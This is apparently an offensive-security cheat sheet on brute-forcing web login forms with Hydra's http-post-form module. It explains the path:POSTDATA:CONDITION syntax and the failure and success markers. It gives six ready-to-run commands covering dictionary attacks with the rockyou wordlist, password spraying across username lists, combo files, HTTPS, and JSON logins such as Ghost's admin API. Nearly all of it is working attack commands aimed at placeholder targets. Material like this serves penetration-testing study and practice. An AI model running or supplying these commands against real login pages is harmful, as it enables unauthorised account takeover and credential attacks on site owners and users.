Brute Force HTTP Login Forms with Hydra
exploitationtool
Summary
Brute force web login forms with Hydra's http-post-form module; the syntax is "path:POSTDATA:CONDITION" using F= for a failure string or S= for success.
Walkthrough
Hydra's http-post-form module brute forces web login forms by replaying POST requests and matching a success or failure marker in the response.
Steps
- The module format is
"path:POSTDATA:CONDITION"where^USER^/^PASS^are substituted from the wordlists. - Use
F=<string>to flag a failed login (any response containing the string is a miss) orS=<string>for a success marker when failures are hard to isolate. - Set the port with
-swhen the app runs off port 80/443; usehttps-post-formfor TLS. - Spray a single password across many usernames with
-L names.txt -p '<PASS>', or supply combos with-C userpass. - JSON-based logins (e.g. Ghost admin API) work too — just put the JSON body in the POSTDATA field and escape the quotes. Match a substring rather than a string containing a literal
:, which breaks parsing.
Commands
bash
hydra -l info -P /usr/share/wordlists/rockyou.txt <TARGET> http-post-form "/login:username=^USER^&password=^PASS^:F=error"
bash
hydra -l jennifer -P /usr/share/wordlists/rockyou.txt <TARGET> -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=:F=loginError"
bash
hydra -l jennifer -P /usr/share/wordlists/rockyou.txt <TARGET> -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=:S=Location"
bash
hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p <PASS> <TARGET> http-post-form "/?q=user/login:name=^USER^&pass=^PASS^&form_build_id=form-xyz&form_id=user_login&op=Log+in:F=Sorry, incorrect password"
bash
hydra -l admin@<TARGET> -P /usr/share/wordlists/rockyou.txt <TARGET> http-post-form "/ghost/api/admin/session:{\"username\":\"^USER^\",\"password\":\"^PASS^\"}:F=Invalid"bash
hydra -C userpass <TARGET> https-post-form "/login.php:username=^USER^&password=^PASS^:F=failed"